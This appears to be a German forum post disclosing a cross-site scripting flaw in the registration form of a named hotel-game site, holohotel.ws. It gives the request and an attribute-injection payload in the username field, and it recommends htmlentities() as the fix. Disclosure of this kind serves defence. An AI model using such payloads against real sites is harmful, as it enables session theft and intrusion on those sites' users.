Code
GET: http://holohotel.ws/register
POST: username=" autofocus onfocus="alert(2)&mail=asdf%40sdf.com&submit=Weiter
Parameter username ist Vulnerable.
Wenn die Webapplication in PHP geschrieben wurde, empfehle ich htmlentities(); um diesen Bug zu fixen.
Weitere Fragen lassen sich per PM klären.
Externer Inhalt
www.youtube.com
Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.